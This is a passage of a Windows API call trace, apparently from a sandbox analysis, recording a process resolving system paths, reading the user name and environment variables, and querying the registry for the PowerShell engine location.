"c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x2de7bc | out: lpFileInformation=0x2de7bc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6cf5da00, ftLastAccessTime.dwHighDateTime=0x1d4ae93, ftLastWriteTime.dwLowDateTime=0x6cf5da00, ftLastWriteTime.dwHighDateTime=0x1d4ae93, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1 [0146.662] GetLastError () returned 0xcb [0146.662] SetErrorMode (uMode=0x1) returned 0x1 [0146.662] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x2de33c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0146.662] GetLastError () returned 0xcb [0146.662] SetErrorMode (uMode=0x1) returned 0x1 [0146.662] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x2de7bc | out: lpFileInformation=0x2de7bc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6cf5da00, ftLastAccessTime.dwHighDateTime=0x1d4ae93, ftLastWriteTime.dwLowDateTime=0x6cf5da00, ftLastWriteTime.dwHighDateTime=0x1d4ae93, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1 [0146.662] GetLastError () returned 0xcb [0146.662] SetErrorMode (uMode=0x1) returned 0x1 [0146.662] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x2de350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0146.662] GetLastError () returned 0xcb [0146.662] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x2de2ec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0146.662] GetLastError () returned 0xcb [0146.662] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2de33c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0146.662] GetLastError () returned 0xcb [0146.662] SetErrorMode (uMode=0x1) returned 0x1 [0146.662] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x2de7bc | out: lpFileInformation=0x2de7bc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x5f059c70, ftLastAccessTime.dwHighDateTime=0x1d35d5c, ftLastWriteTime.dwLowDateTime=0x5f059c70, ftLastWriteTime.dwHighDateTime=0x1d35d5c, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1 [0146.662] GetLastError () returned 0xcb [0146.662] SetErrorMode (uMode=0x1) returned 0x1 [0146.663] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2de33c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0146.663] GetLastError () returned 0xcb [0146.663] SetErrorMode (uMode=0x1) returned 0x1 [0146.663] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x2de7bc | out: lpFileInformation=0x2de7bc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x5f059c70, ftLastAccessTime.dwHighDateTime=0x1d35d5c, ftLastWriteTime.dwLowDateTime=0x5f059c70, ftLastWriteTime.dwHighDateTime=0x1d35d5c, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1 [0146.663] GetLastError () returned 0xcb [0146.663] SetErrorMode (uMode=0x1) returned 0x1 [0146.663] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2de350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0146.663] GetLastError () returned 0xcb [0146.663] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x2de2ec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0146.663] GetLastError () returned 0xcb [0146.722] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2de40c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0146.722] GetLastError () returned 0xcb [0146.722] SetErrorMode (uMode=0x1) returned 0x1 [0146.723] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x2cdc3d8 | out: lpFileInformation=0x2cdc3d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x5f059c70, ftLastAccessTime.dwHighDateTime=0x1d35d5c, ftLastWriteTime.dwLowDateTime=0x5f059c70, ftLastWriteTime.dwHighDateTime=0x1d35d5c, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1 [0146.723] GetLastError () returned 0xcb [0146.723] SetErrorMode (uMode=0x1) returned 0x1 [0146.724] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2de454, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.724] GetLastError () returned 0xcb [0146.724] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2de404, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.724] GetLastError () returned 0xcb [0146.724] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2de404, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.724] GetLastError () returned 0xcb [0146.724] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2de404, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.724] GetLastError () returned 0xcb [0146.751] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x3d2e10, nSize=0x2de9a8 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x2de9a8) returned 0x1 [0146.806] GetLastError () returned 0xcb [0146.806] GetUserNameW (in: lpBuffer=0x3da558, pcbBuffer=0x2de9b0 | out: lpBuffer="aETAdzjz", pcbBuffer=0x2de9b0) returned 1 [0146.807] ReportEventW (hEventLog=0x2b20004, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2cfd0d8*="Available", lpRawData=0x2cfcf94) returned 1 [0146.822] GetLastError () returned 0x0 [0146.822] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3da558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0146.822] GetLastError () returned 0xcb [0146.823] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3da558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0146.823] GetLastError () returned 0xcb [0146.884] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2de488, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.884] GetLastError () returned 0xcb [0146.884] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2de438, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.884] GetLastError () returned 0xcb [0146.884] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2de438, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.884] GetLastError () returned 0xcb [0146.891] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2de42c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.891] GetLastError () returned 0xcb [0146.891] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2de3dc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.891] GetLastError () returned 0xcb [0146.891] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2de3dc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.891] GetLastError () returned 0xcb [0146.891] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x3da558, nSize=0x80 | out: lpBuffer="C:") returned 0x2 [0146.891] GetLastError () returned 0xcb [0146.891] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x3da558, nSize=0x80 | out: lpBuffer="\\Users\\aETAdzjz") returned 0xf [0146.891] GetLastError () returned 0xcb [0146.891] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2de42c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.891] GetLastError () returned 0xcb [0146.891] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2de3dc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.891] GetLastError () returned 0xcb [0146.891] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2de3dc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.891] GetLastError () returned 0xcb [0146.892] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2de42c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.892] GetLastError () returned 0xcb [0146.892] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2de3dc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.892] GetLastError () returned 0xcb [0146.892] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2de3dc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.892] GetLastError () returned 0xcb [0146.892] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2de42c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.892] GetLastError () returned 0xcb [0146.892] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2de3dc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.892] GetLastError () returned 0xcb [0146.892] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2de3dc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.892] GetLastError () returned 0xcb [0146.892] GetCurrentProcessId () returned 0xb50 [0146.892] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2de42c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.892] GetLastError () returned 0xcb [0146.892] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2de3dc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.892] GetLastError () returned 0xcb [0146.892] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2de3dc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.892] GetLastError () returned 0xcb [0146.892] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2de418, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.893] GetLastError () returned 0xcb [0146.893] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2de3c8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.893] GetLastError () returned 0xcb [0146.893] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2de3c8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.893] GetLastError () returned 0xcb [0146.893] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2de418, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.893] GetLastError () returned 0xcb [0146.893] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2de3c8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.893] GetLastError () returned 0xcb [0146.893] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2de3c8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.893] GetLastError () returned 0xcb [0146.893] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2de42c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.893] GetLastError () returned 0xcb [0146.893] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2de3dc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.893] GetLastError () returned 0xcb [0146.893] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2de3dc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.893] GetLastError () returned 0xcb [0146.893] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x2de93c | out: phkResult=0x2de93c*=0x39c) returned 0x0 [0146.894] RegQueryValueExW (in: hKey=0x39c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x2de984, lpData=0x0, lpcbData=0x2de980*=0x0 | out: lpType=0x2de984*=0x1, lpData=0x0, lpcbData=0x2de980*=0x56) returned 0x0 [0146.894] RegQueryValueExW (in: hKey=0x39c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x2de984, lpData=0x3da558, lpcbData=0x2de980*=0x56 | out: lpType=0x2de984*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x2de980*=0x56) returned 0x0 [0146.894] RegCloseKey (hKey=0x39c) returned 0x0 [0146.894] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2de42c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.895] GetLastError () returned 0xcb [0146.895] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2de3dc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.895] GetLastError () returned 0xcb [0146.895] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2de3dc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.895] GetLastError () returned 0xcb [0146.895] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2de414, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.895] GetLastError () returned 0xcb [0146.895] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2de3c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.895] GetLastError () returned 0xcb [0146.895] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2de3c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0146.895] GetLastError () returned 0xcb [0147.033] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddaa4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.033] GetLastError () returned 0xcb [0147.033] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2dda54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.033] GetLastError () returned 0xcb [0147.033] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2dda54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.033] GetLastError () returned 0xcb [0147.033] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddaa4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.033] GetLastError () returned 0xcb [0147.033] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2dda54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.033] GetLastError () returned 0xcb [0147.033] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2dda54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.033] GetLastError () returned 0xcb [0147.034] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ddaa4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.034] GetLastError () returned 0xcb [0147.034] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2dda54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0147.034] GetLastError () returned 0xcb [0147.034] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2dda54, lpFilePart=0x0 | out: 